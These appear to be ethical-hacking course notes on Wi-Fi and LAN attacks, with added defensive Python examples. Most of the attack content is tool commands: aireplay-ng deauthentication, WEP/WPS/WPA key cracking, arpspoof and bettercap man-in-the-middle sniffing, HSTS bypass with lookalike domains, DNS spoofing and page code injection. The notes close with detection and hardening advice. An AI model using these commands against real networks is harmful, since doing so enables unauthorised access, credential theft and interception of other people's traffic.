Network Hacking¶
Intro¶
Pre-connection attacks
gaining access
Post-connection attacks
What is a MAC Address?¶
Media Access Control
Permanent
Physical
Unique
Assigned by manufacturer
Why Change the MAC Address?¶
Increase anonymity
Impersonate other devices
Bypass filters
Changing the MAC Address¶
ifconfig wlan0 down
ifconfig wlan0 hw ether 00:11:22:33:44:55
# bring the interface back up so the new address is actually used
ifconfig wlan0 up
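A MAC that has been changed with `ifconfig ... hw ether` (or randomized by the OS) is usually recognisable: the universally/locally administered (U/L) bit, bit 1 of the first octet, is set on addresses that were not assigned by a manufacturer. The parser below is an added example, not part of the original notes; it checks addresses in the two common notations and classifies them, using the page's own `00:11:22:33:44:55` plus constructed sample values.

```python
import re

# Constructed sample addresses: the first is the one used in the notes above,
# the others are made up to exercise each branch of the classifier.
SAMPLE_MACS = [
    "00:11:22:33:44:55",   # universally administered (manufacturer-assigned)
    "02-11-22-33-44-55",   # same address with the U/L bit set: locally administered
    "f8:23:b2:b9:50:a8",   # BSSID format used later in the notes
    "01:00:5e:00:00:fb",   # IPv4 multicast group address
]


def parse_mac(mac: str) -> bytes:
    """Accept aa:bb:cc:dd:ee:ff or aa-bb-cc-dd-ee-ff and return the 6 raw bytes."""
    parts = re.split(r"[:-]", mac.strip())
    if len(parts) != 6 or not all(re.fullmatch(r"[0-9a-fA-F]{2}", p) for p in parts):
        raise ValueError(f"not a MAC address: {mac!r}")
    return bytes(int(p, 16) for p in parts)


def is_multicast(mac: str) -> bool:
    # I/G bit: bit 0 of the first octet (0x01) marks group/multicast addresses.
    return bool(parse_mac(mac)[0] & 0x01)


def is_locally_administered(mac: str) -> bool:
    # U/L bit: bit 1 of the first octet (0x02). Manufacturer-assigned addresses
    # have it clear; spoofed or randomized addresses normally have it set.
    return bool(parse_mac(mac)[0] & 0x02)


def oui(mac: str) -> str:
    """The first three octets, which identify the manufacturer for burned-in addresses."""
    return ":".join(f"{b:02x}" for b in parse_mac(mac)[:3])


def classify(mac: str) -> str:
    if is_multicast(mac):
        return "multicast/group"
    if is_locally_administered(mac):
        return "locally administered (changed or randomized)"
    return f"universally administered, OUI {oui(mac)}"


if __name__ == "__main__":
    for m in SAMPLE_MACS:
        print(f"{m:20} {classify(m)}")
```

On a network you administer, flagging locally administered addresses in DHCP leases or switch MAC tables is a cheap way to spot devices that changed their address; it is not proof of anything on its own, since many phones randomize their Wi-Fi MAC by default.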
Wireless Modes¶
iwconfig
ifconfig wlan0 down
airmon-ng check kill
iwconfig wlan0 mode monitor
# bring the interface back up in monitor mode
ifconfig wlan0 up
iwconfig
Pre-Connection Attacks¶
Packet Sniffing¶
Using airodump-ng
Part of the aircrack-ng suite
airodump-ng is a packet sniffer
Used to capture all packets within range
Display detailed info about networks around us
Connected clients etc.
airodump-ng [MonitorModeInterface]
WiFi Bands¶
Decides the frequency range that can be used
Determines the channels that can be used
Clients need to support the band used by the router to communicate with it.
Data can only be sniffed from a band if the wireless adapter used supports that band
The most common Wi-Fi bands are:
a - uses the 5 GHz frequency only
b, g - use the 2.4 GHz frequency only
n - uses both 5 GHz and 2.4 GHz
ac - uses frequencies lower than 6 GHz
airodump-ng --band a mon0
airodump-ng --band abg mon0
Targeted Packet Sniffing¶
airodump-ng --bssid F8:23:B2:B9:50:A8 --channel 2 --write test mon0
Deauthentication Attack¶
Disconnect any client from any network
Works on encrypted networks (WEP, WPA, & WPA2)
No need to know the network key
No need to connect to the network
aireplay-ng --deauth [#DeauthPackets] -a [NetworkMac] -c [TargetMac] [Interface]
Gaining Access - WEP Cracking¶
Theory Behind Cracking WEP Encryption¶
Wired Equivalent Privacy
Old encryption
Uses an algorithm called RC4
Still used in some networks
Can be cracked easily
WEP Cracking
Client encrypts data using a key
Encrypted packet sent in the air
Router decrypts packet using the key
Each packet is encrypted using a unique key stream
A random initialization vector (IV) is used to generate the key streams
The IV is only 24 bits
IV + Key (Password) = key stream
The IV is too small (only 24 bits)
The IV is sent in plain text
Result:
IVs will repeat on busy networks
This makes WEP vulnerable to statistical attacks
Repeated IVs can be used to determine the key stream
and break the encryption
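How quickly a 24-bit IV repeats follows from the birthday bound: with N = 2^24 possible IVs, the probability that at least one IV has already been reused after n packets is about 1 - exp(-n(n-1)/2N). The calculation below is an added illustration, not part of the original notes, and assumes IVs are chosen uniformly at random (a real driver that uses a counter wraps after exactly 2^24 packets instead, which is no better).

```python
import math

IV_BITS = 24
IV_SPACE = 1 << IV_BITS  # 16,777,216 possible IVs


def collision_probability(packets: int, space: int = IV_SPACE) -> float:
    """Probability that at least one IV repeats among `packets` random IVs (birthday approximation)."""
    if packets < 2:
        return 0.0
    return 1.0 - math.exp(-packets * (packets - 1) / (2.0 * space))


def expected_repeated_pairs(packets: int, space: int = IV_SPACE) -> float:
    """Expected number of (packet, packet) pairs sharing an IV: C(n, 2) / N."""
    return packets * (packets - 1) / (2.0 * space)


def packets_for_probability(p: float, space: int = IV_SPACE) -> int:
    """Smallest n for which the collision probability reaches p (inverse of the formula above)."""
    return math.ceil(math.sqrt(2.0 * space * math.log(1.0 / (1.0 - p))))


def hours_to_exhaust(packets_per_second: float, space: int = IV_SPACE) -> float:
    """Time after which a counter-based IV must wrap and every IV is guaranteed to have repeated."""
    return space / packets_per_second / 3600.0


if __name__ == "__main__":
    print(f"IV space: {IV_SPACE:,}")
    print(f"50% chance of a repeat after {packets_for_probability(0.5):,} packets")
    for n in (1_000, 5_000, 10_000, 50_000):
        print(f"{n:>7,} packets: P(repeat) = {collision_probability(n):.4f}, "
              f"expected repeated pairs = {expected_repeated_pairs(n):.2f}")
    print(f"at 500 packets/s a counter wraps after {hours_to_exhaust(500):.1f} h")
```

A few thousand packets are enough for the first repeat, and on a busy network the expected number of repeated IV pairs grows with the square of the traffic, which is why the notes say capturing "a large number of packets/IVs" is the whole attack.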
WEP Cracking Basics¶
Conclusion:
To crack WEP we need to:
Capture a large number of packets/IVs - using airodump-ng
Analyse the captured IVs and crack the key - using aircrack-ng
airodump-ng --bssid 00:11:22:33:44:55 --channel 1 --write basic_wep mon0
aircrack-ng basic_wep-01.cap
# Use the key shown in brackets, e.g. [ 41:73:32:33:70 ], and connect to the Wi-Fi with the key minus the colons (4173323370)
Fake Authentication Attack¶
Problem:
If the network is not busy
It would take a long time to capture enough IVs
Solution:
Force the AP to generate new IVs
Problem:
APs only communicate with connected clients.
We can't communicate with it
We can't even start the attack
Solution:
Associate with the AP before launching the attack
airodump-ng --bssid 00:11:22:33:44:55 --channel 6 --write arpreplay mon0
aireplay-ng --fakeauth 0 -a [targetAPMac] -h [MyMacAddressFirst8DigitsofUnspec] mon0
ARP Request Replay Attack¶
Wait for an ARP packet
Capture it, and replay it (retransmit it)
This causes the AP to produce another packet with a new IV
Keep doing this until we have enough IVs to crack the key
airodump-ng --bssid 00:11:22:33:44:55 --channel 6 --write arpreplay mon0
aireplay-ng --fakeauth 0 -a [targetAPMac] -h [MyMacAddressFirst8DigitsofUnspec] mon0
aireplay-ng --arpreplay -b [targetAPMac] -h [MyMacAddressFirst8DigitsofUnspec] mon0
aireplay-ng --fakeauth 0 -a [targetAPMac] -h [MyMacAddressFirst8DigitsofUnspec] mon0
aircrack-ng arpreplay-01.cap
Gaining Access - WPA/WPA2 Cracking¶
Intro¶
Both can be cracked using the same methods
Made to address the issues in WEP
Much more secure
Each packet is encrypted using a unique temporary key
Packets contain no useful information
WPS is a feature that can be used with WPA & WPA2
Allows a client to connect without the password
Authentication is done using an 8-digit PIN
8 digits is a very small keyspace
All possible PINs can be tried in a relatively short time
The WPS PIN can then be used to compute the actual password
PS. this only works if the router is configured not to use PBC (Push Button Authentication)
Hacking WPA & WPA2 Without a Wordlist¶
# Discover WPS networks
wash --interface mon0
# Run reaver
reaver --bssid 00:11:22:33:44:55 --channel 1 --interface mon0 -vvv --no-associate
# Then do the auth attack
aireplay-ng --fakeauth 30 -a [targetRouterMAC] -h [myMACAddress] mon0
Capturing the Handshake¶
WPA fixed all weaknesses in WEP
Packets contain no useful data
The only packets that can aid the cracking process are the handshake packets
These are the 4 packets exchanged when a client connects to the network
# Run airodump as usual to get the BSSID and channel
# Then run airodump again
airodump-ng --bssid 00:11:22:33:44:55 --channel 1 --write wpa_handshake mon0
# Wait for a device to connect, or run a deauth attack to disconnect a client so it reconnects and the handshake packets can be captured
aireplay-ng --deauth 4 -a 00:11:22:33:44:55 -c [clientsMACAddress] mon0
Creating a Wordlist¶
The handshake does not contain data that helps recover the key
It contains data that can be used to check whether a candidate key is valid or not
Crunch can be used to create a wordlist
Syntax: crunch [min] [max] [characters] -t [pattern] -o [filename]
Example: crunch 6 8 123abc$ -o wordlist -t a@@@@b
Example generated passwords (each @ in the pattern is replaced by a character from the set):
aaaaab
aabbbb
aan$$b
Links to wordlists
Cracking WPA & WPA2 Using a Wordlist Attack¶
aircrack-ng wpa_handshake-01.cap -w test.txt
Gaining Access - Security¶
Securing Your Network From Hackers¶
Now that we know how to test the security of all known wireless encryptions (WEP/WPA/WPA2), it is relatively easy to secure our networks against these attacks, because we know all the weaknesses hackers can use to crack these encryptions.
So let's look at each of these encryptions one by one:
WEP: WEP is an old encryption and it is really weak. As we have seen in the course, there are a number of methods that can be used to crack this encryption regardless of the strength of the password, and even if nobody is connected to the network. These attacks are possible because of the way WEP works; we discussed the weakness of WEP and how it can be used to crack it, and some of these methods even allow you to crack the key in a few minutes.
WPA/WPA2: WPA and WPA2 are very similar; the only difference between them is the algorithm used to encrypt the information, but both encryptions work in the same way. WPA/WPA2 can be cracked in two ways:
If the WPS feature is enabled, there is a high chance of obtaining the key regardless of its complexity by exploiting a weakness in the WPS feature. WPS is used to allow users to connect to their wireless network without entering the key; this is done by pressing a WPS button on both the router and the device they want to connect. The authentication works using an eight-digit PIN, and hackers can brute-force this PIN in a relatively short time (on average 10 hours); once they get the right PIN they can use a tool called reaver to reverse engineer the PIN and get the key. This is all possible because the WPS feature uses an easy PIN (only 8 characters, all digits), so it is not a weakness in WPA/WPA2 itself, but a weakness in a feature that can be enabled on routers that use WPA/WPA2 and that can be exploited to get the actual WPA/WPA2 key.
If WPS is not enabled, then the only way to crack WPA/WPA2 is a dictionary attack: a list of passwords (dictionary) is compared against the handshake file to check whether any of the passwords is the actual key for the network. If the password does not exist in the wordlist, the attacker will not be able to find it.
Conclusion:
Do not use WEP encryption; we have seen how easy it is to crack regardless of the complexity of the password, and even if nobody is connected to the network.
Use WPA2 with a complex password; make sure the password contains small letters, capital letters, symbols and numbers, and
Ensure that the WPS feature is disabled, as it can be used to crack your complex WPA2 key by brute-forcing the easy WPS PIN.
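The two defensive points above (a passphrase that will not be in any wordlist, and why the dictionary attack is the only remaining route) can be checked concretely. The code below is an added example and not part of the original notes. It applies the WPA/WPA2-PSK passphrase limits (8 to 63 printable ASCII characters), the character-class rule the conclusion gives, and a lookup against a small constructed wordlist; it also shows the standard PSK derivation, PBKDF2-HMAC-SHA1 with 4096 iterations over the SSID, which is what each candidate password in a wordlist attack has to go through and is the reason those attacks are slow. The derivation is checked against the published IEEE 802.11i-2004 Annex H test vector (passphrase "password", SSID "IEEE"). The wordlist and passphrases are constructed samples.

```python
import hashlib
import string

WPA_MIN_LEN, WPA_MAX_LEN = 8, 63  # passphrase length limits for WPA/WPA2-PSK

# Constructed stand-in for a real wordlist (a few typical entries only).
SAMPLE_WORDLIST = {"password", "12345678", "qwertyui", "letmein1", "admin123"}


def check_passphrase(pw: str, wordlist=SAMPLE_WORDLIST) -> list:
    """Return a list of problems; an empty list means the passphrase meets the policy."""
    problems = []
    if not (WPA_MIN_LEN <= len(pw) <= WPA_MAX_LEN):
        problems.append(f"length {len(pw)} outside {WPA_MIN_LEN}-{WPA_MAX_LEN}")
    if any(c not in string.printable or c in "\t\n\r\x0b\x0c" for c in pw):
        problems.append("contains a non-printable or non-ASCII character")
    classes = {
        "lowercase": any(c.islower() for c in pw),
        "uppercase": any(c.isupper() for c in pw),
        "digits": any(c.isdigit() for c in pw),
        "symbols": any(c in string.punctuation for c in pw),
    }
    for name, present in classes.items():
        if not present:
            problems.append(f"no {name}")
    if pw.lower() in wordlist:
        problems.append("found in wordlist")
    return problems


def wpa_psk(passphrase: str, ssid: str) -> bytes:
    """PSK = PBKDF2-HMAC-SHA1(passphrase, ssid, 4096 iterations, 32 bytes), as in 802.11i."""
    return hashlib.pbkdf2_hmac("sha1", passphrase.encode(), ssid.encode(), 4096, 32)


def candidate_work(wordlist_size: int, iterations: int = 4096) -> int:
    """Number of HMAC-SHA1 computations a wordlist attack must perform (2 per PBKDF2 block x 2 blocks)."""
    return wordlist_size * iterations * 4


if __name__ == "__main__":
    for pw in ("password", "Tr0ub4dor&3x!Qz", "abc"):
        print(f"{pw!r:20} -> {check_passphrase(pw) or 'OK'}")
    print("PSK for 'password'/'IEEE':", wpa_psk("password", "IEEE").hex())
    print("HMAC-SHA1 operations for a 10-million-word list:", f"{candidate_work(10_000_000):,}")
```

Because the SSID is the PBKDF2 salt, a precomputed table only helps against networks that share a common SSID; a non-default SSID plus a passphrase that passes the checks above leaves an attacker with the full per-network PBKDF2 cost for every guess.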
Post Connection Attacks - Information Gathering¶
Discover all devices on the network
Display their:
IP Address
MAC Address
OS
Open ports
Running services
Etc.
netdiscover -r 10.0.2.1/24
Network Mapping¶
nmap is a HUGE security scanner
From an IP or IP range it can discover:
Open ports
Running services
Operating system
Connected clients
Etc.
# You can also use the tool Zenmap
nmap -T4 -A -v 192.168.1.1/24
nmap -T4 -F 192.168.1.1/24
nmap -sV -T4 -O -F --version-light 192.168.1.1/24
Post Connection Attacks - MiTM¶
ARP Poisoning¶
Address Resolution Protocol
Simple protocol used to map the IP address of a machine to its MAC address
Why ARP spoofing is possible:
Clients accept responses even if they did not send a request
Clients trust responses without any form of verification
Intercepting Network Traffic¶
Arpspoof
arpspoof is a tool to run ARP spoofing attacks
Simple and reliable
Ported to most operating systems, including Android and iOS
Usage is always the same
Usage:
arpspoof -i [interface] -t [clientIP] [gatewayIP]
arpspoof -i [interface] -t [gatewayIP] [clientIP]
# Enable IP forwarding so the intercepted traffic is passed on and the targets keep their connectivity
echo 1 > /proc/sys/net/ipv4/ip_forward
Bettercap Basics¶
Framework to run network attacks
Can be used to:
ARP spoof targets (redirect the flow of packets)
Sniff data (URLs, usernames, passwords)
Bypass HTTPS
Redirect domain requests (DNS spoofing)
Inject code into loaded pages
And more
usage: bettercap -iface [interface]
net.probe on
net.show
ARP Spoofing using Bettercap¶
set arp.spoof.fullduplex true
set arp.spoof.targets 10.0.2.7
arp.spoof on
Spying on Network Devices (Capturing Passwords, etc.)¶
net.sniff on
# go to http://vulnweb.com on the target
Creating Custom Spoofing Script¶
bettercap -iface eth0 -caplet spoof.cap
Bypass HTTPS¶
Problem:
Data in HTTP is sent as plain text
A MITM can read and edit requests and responses
Not secure
Solution:
Use HTTPS
HTTPS is an adaptation of HTTP
Encrypts HTTP using TLS or SSL
Problem:
Most websites use HTTPS
Sniffed data will be encrypted
Solution:
Downgrade HTTPS to HTTP
hstshijack/hstshijack
Bypassing HSTS¶
HSTS
HTTP Strict Transport Security
Used by Facebook, Twitter and a few other well-known websites
Problem:
Modern browsers are hard-coded to only load a list of HSTS websites over HTTPS
Solution:
Trick the browser into loading a different website
Replace all links to HSTS websites with similar-looking links
Ex.
facebook.com -> facebook.corn
twitter.com -> twiter.com
# modify the hstshijack.cap file
Bypassing HSTS Recap¶
| | Examples | Hacker Setup | Firefox | Chrome |
|---|---|---|---|---|
| HTTP | vulnweb.com | Bettercap | X | X |
| HTTPS | linkedin.com, winzip.com, stackoverflow.com, google.ie, netflix.com | zSec custom Kali + Bettercap + HSTShijack | X | Website needs to be included in the HSTSHijack caplet |
| Preloaded HSTS | twitter.com, facebook.com, github.com | zSec custom Kali + Bettercap + HSTShijack | X | Works if Secure DNS is disabled |
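From the defender's side, the difference between the HTTPS and Preloaded HSTS columns comes down to the Strict-Transport-Security header a site sends and whether it qualifies for the browser preload list. The checker below is an added example, not part of the original notes; it parses the header and reports the header-level preload requirements (max-age of at least one year, includeSubDomains, preload). The hstspreload.org submission process additionally requires a valid certificate and an HTTP-to-HTTPS redirect on the same host, which cannot be judged from the header alone. The headers tested are constructed samples.

```python
from typing import Optional

ONE_YEAR = 31536000  # minimum max-age (seconds) accepted for the preload list


def parse_hsts(header: str) -> dict:
    """Split 'max-age=31536000; includeSubDomains; preload' into a directive dict (names lower-cased)."""
    directives = {}
    for part in header.split(";"):
        part = part.strip()
        if not part:
            continue
        name, _, value = part.partition("=")
        directives[name.strip().lower()] = value.strip().strip('"')
    return directives


def evaluate_hsts(header: Optional[str]) -> list:
    """Return a list of findings; empty means the header satisfies the preload requirements."""
    if header is None:
        return ["no Strict-Transport-Security header: a first visit over HTTP can be downgraded"]
    d = parse_hsts(header)
    if "max-age" not in d or not d["max-age"].isdigit():
        return ["max-age missing or invalid; browsers ignore the header entirely"]
    findings = []
    max_age = int(d["max-age"])
    if max_age == 0:
        findings.append("max-age=0 clears any stored policy")
    elif max_age < ONE_YEAR:
        findings.append(f"max-age {max_age}s is below the one-year preload minimum")
    if "includesubdomains" not in d:
        findings.append("includeSubDomains missing: subdomains can still be reached over HTTP (required for preload)")
    if "preload" not in d:
        findings.append("preload directive missing: site cannot be added to the browser preload list")
    return findings


def preload_eligible(header: Optional[str]) -> bool:
    return evaluate_hsts(header) == []


if __name__ == "__main__":
    # Constructed sample headers covering the three rows of the recap table.
    samples = {
        "plain HTTP site": None,
        "HTTPS, short policy": "max-age=300",
        "preload-ready": "max-age=31536000; includeSubDomains; preload",
    }
    for label, hdr in samples.items():
        print(f"{label:22} -> {evaluate_hsts(hdr) or 'preload requirements met'}")
```

Without preloading, the header only protects visitors who have already seen it once over HTTPS, which is exactly the window the recap table's HTTPS row relies on.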
DNS Spoofing¶
bettercap -iface eth0 -caplet /root/spoof.cap
set dns.spoof.all true
set dns.spoof.domains zsecurity.org,*.zsecurity.org
dns.spoof on
Injecting Javascript Code¶
Bettercap code injection
Injects JavaScript code into loaded pages
The code gets executed in the target's browser
This can be used to:
Replace links
Replace images
Insert html elements
Hook target browser to exploitation frameworks
and more
Bettercap Web Interface¶
Web interface
More user-friendly
Requires more resources
And more modules
bettercap -iface eth0
ui.update
http-ui
# credentials
user, pass
Wireshark¶
Wireshark is a network protocol analyser
Designed to help network administrators keep track of what's happening in their network
How it works:
Logs packets that flow through the selected interface
Analyses all the packets
When we are the MITM, Wireshark can be used to sniff and analyse traffic sent/received by targets
Detection & Security¶
ARP Spoofing¶
Why ARP spoofing is possible:
Clients accept responses even if they did not send a request
Clients trust responses without any form of verification
Use XArp on Windows and Linux to detect ARP poisoning
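The two weaknesses listed above are also what a detector looks for: ARP replies that no one asked for, and an IP address whose MAC suddenly changes (or one MAC that starts answering for several IPs, which is what a full-duplex spoof of client and gateway looks like). The monitor below is an added example, not part of the original notes or of XArp; it runs the same ARP-table analysis over a small constructed capture in which a client first learns the gateway normally and then a third host starts claiming both addresses.

```python
from dataclasses import dataclass


@dataclass
class ArpPacket:
    op: str          # "request" or "reply"
    sender_ip: str
    sender_mac: str
    target_ip: str


# Constructed capture: addresses follow the 10.0.2.x scheme used in the notes,
# MACs are made up. Packets 3 and 4 are the poisoning.
SAMPLE_CAPTURE = [
    ArpPacket("request", "10.0.2.7", "08:00:27:aa:aa:aa", "10.0.2.1"),   # client asks for the gateway
    ArpPacket("reply",   "10.0.2.1", "52:54:00:12:35:00", "10.0.2.7"),   # real gateway answers
    ArpPacket("reply",   "10.0.2.1", "08:00:27:bb:bb:bb", "10.0.2.7"),   # unsolicited: attacker claims gateway IP
    ArpPacket("reply",   "10.0.2.7", "08:00:27:bb:bb:bb", "10.0.2.1"),   # unsolicited: same MAC claims client IP
]


class ArpMonitor:
    def __init__(self):
        self.table = {}       # ip -> mac currently learned, like the host's ARP cache
        self.pending = set()  # (asker_ip, asked_ip) requests still waiting for a reply
        self.alerts = []

    def process(self, pkt: ArpPacket) -> None:
        if pkt.op == "request":
            self.pending.add((pkt.sender_ip, pkt.target_ip))
            self.table.setdefault(pkt.sender_ip, pkt.sender_mac)
            return
        # A legitimate reply answers a request we saw going the other way.
        key = (pkt.target_ip, pkt.sender_ip)
        if key in self.pending:
            self.pending.discard(key)
        else:
            self.alerts.append(f"unsolicited ARP reply: {pkt.sender_ip} is-at {pkt.sender_mac}")
        old = self.table.get(pkt.sender_ip)
        if old is not None and old != pkt.sender_mac:
            self.alerts.append(f"MAC change for {pkt.sender_ip}: {old} -> {pkt.sender_mac}")
        self.table[pkt.sender_ip] = pkt.sender_mac
        claimants = sorted(ip for ip, mac in self.table.items() if mac == pkt.sender_mac)
        if len(claimants) > 1:
            self.alerts.append(f"{pkt.sender_mac} claims multiple IPs: {claimants}")


def analyze(capture) -> list:
    """Run the monitor over a list of ArpPackets and return the alerts raised."""
    mon = ArpMonitor()
    for pkt in capture:
        mon.process(pkt)
    return mon.alerts


if __name__ == "__main__":
    for alert in analyze(SAMPLE_CAPTURE):
        print("ALERT:", alert)
```

Feeding real traffic into `analyze` means parsing ARP frames from a capture (for example with a pcap library) into `ArpPacket` records; the decision logic stays the same. A MAC change alone is normal when hardware is replaced, so the unsolicited-reply and multiple-IP findings are the ones worth paging on.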
MITM Attacks¶
Detection:
Analysing ARP tables
Using tools such as XArp
Using Wireshark
Problems:
Detection is not the same as prevention
Only works for ARP spoofing.
Solution:
Encrypt traffic
HTTPS everywhere plugin
Using a VPN
Benefits of VPN:
Extra layer of encryption
More privacy & anonymity
Bypass censorship
Protection from hackers
Notes:
Use a reputable VPN
Avoid free providers
Make sure they keep no logs
Use HTTPS Everywhere